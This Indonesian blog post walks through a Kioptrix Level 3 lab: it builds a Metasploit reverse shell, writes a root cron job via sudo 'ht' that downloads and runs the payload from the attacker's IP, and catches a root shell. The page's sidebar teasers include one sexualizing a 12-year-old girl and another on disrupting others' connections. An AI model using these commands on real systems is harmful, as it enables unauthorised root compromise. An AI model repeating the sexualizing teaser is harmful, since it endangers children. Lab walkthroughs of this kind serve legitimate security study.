[KIOPTRIX LV3] Metasploit VS Ubuntu
[KIOPTRIX LV3] Metasploit VS Ubuntu

Ini adalah lanjutan dari post [KIOPTRIX LV 3] Attack User
Pada Pentest kali ini, saya akan mendemonstrasikan menyerang web server yang menggunakan Ubuntu dengan Metasploit.
Note: IP address saya 192.168.1.2
Preparation:
1. Metasploit ---> Download Page
Briefing:
1. Buat backdoor
2. Buat Script untuk mendownload backdoor yang sudah kita buat
3. Jalankan exploit multi handler dan Game Over
Walkthrough:
1. Buat backdoor
root@red-dragon:# cd /pentest/exploits/framework2
root@red-dragon:/pentest/exploits/framework2# msfpayload -p linux x86/shell/reverse_tcp LHOST=192.168.1.2 LPORT=4444 X > /var/www/back.door
2. Buat Script untuk mendownload backdoor yang sudah kita buat
Buka terminal, lalu masukan perintah:
root@red-dragon:/pentest/exploits/framework2# ssh loneferret@kioptrix3.com
Masukan password.
Note: Password bisa dilihat pada post sebelumnya mengenai [KIOPTRIX LV 3] Attack User
Kemudian
loneferret@kioptrix3:~$ sudo ht
Note: Jika ditanyakan password, masukan password loneferret
Password bisa dilihat pada post sebelumnya mengenai [KIOPTRIX LV 3] Attack User
Pada console ht, tekan atl+f kemudian pilih new
Masukan kode berikut:
* * * * * root cd /tmp/; wget 192.168.1.2/back.door && chmod +x && ./back.door; rm /etc/cron.d/exploit
Tekan alt+f kemudian pilih save, dan masukan nama file dengan nama /etc/cron.d/exploit
3. Jalankan exploit multi handler dan Game Over
Buka terminal masukan perintah:
root@red-dragon:/pentest/exploits/framework2# msfcli multi/handler PAYLOAD=linux x86/shell/reverse_tcp LHOST=192.168.1.2 LPORT=4444 E
Tunggu sejanak.. Daaaaaaaan..
Berhasil.. Command Shell sesi pertama telah terbuka. Dalam keadaan ini, kita telah mengendalikan system dengan terminal atas nama root (administrator)
About: jefri
You may also like...
Langganan:
Posting Komentar (Atom)
Recent Posts
Popular Posts
-
1.LOAD_FILE Load file adalah query SQL untuk meng-load suatu file scara remote..kurang lebihnya seperti itu ..
-
assalamualaikummm permisi bang ane cuma mau share,.... gimana cara atau trik membuat Flashing screen ( atau layar menjadi kelap kelip,....)
-
pada kamus ini terdapat pilihan opsi dari bahasa Perancis ke Indonesia, dari bahasa Indonesia ke Perancis, lihat seluruh kata, tes, help se...
-
Situs jejaring sosial seperti Twitter dan Facebookbisa menjadi sarana flirting dan aturan berpacaran lewat situs jejaring sosial ini...
-
siap meluncur di tunggu dari kawan kawan untuk sharing bugs and scaning pake bot
-
Buat Ngerjaain Koneksi Orang Gunakan Seperlunya... Misalnya buat mutusin koneksi orang yang lagi buka situs porno
-
Apakah Anda punya sahabat atau rekan yang tampan, mapan tapi sampai sekarang masih senang sendiri dan belum berkeinginan punya pacar. Wa...
-
ada model baru dari vietnam. baru 12 taun gan. liat kaki nya deh gan, bikin deg deg an Cewek Idaman : Lê Hoàng Bảo Trân (Le Hoang Bao ...
-
Assalamu alaikum Sudah lama tidak posting blog nih disini saya akan membahas cara membuat program transaksi penjualan dengan Fox pro ...
-
Ciuman adalah bahasa tubuh yang populer untuk mengungkapkan rasa sayang kepada pasangan, teman maupun keluarga. Tapi ada beberapa tipe...
Recent Comments
Labels
Labels
Find us on Facebook
Labels
- backtrack (47)
- berita (12)
- blogseo (6)
- education (1)
- foxpro (2)
- hacking (78)
- Ilmu Komputer (131)
- info unik (32)
- intim (12)
- kesehatan (23)
- lounge (4)
- love (11)
- network (1)
- Network-Linux (1)
- network-windows (1)
- olahraga (5)
- pascal (2)
- php (1)
- programer (29)
- relationship (23)
- sqljavascriptdll (7)
- Virus (1)
- webhacking (9)
- wifihack (8)
Tidak ada komentar:
Posting Komentar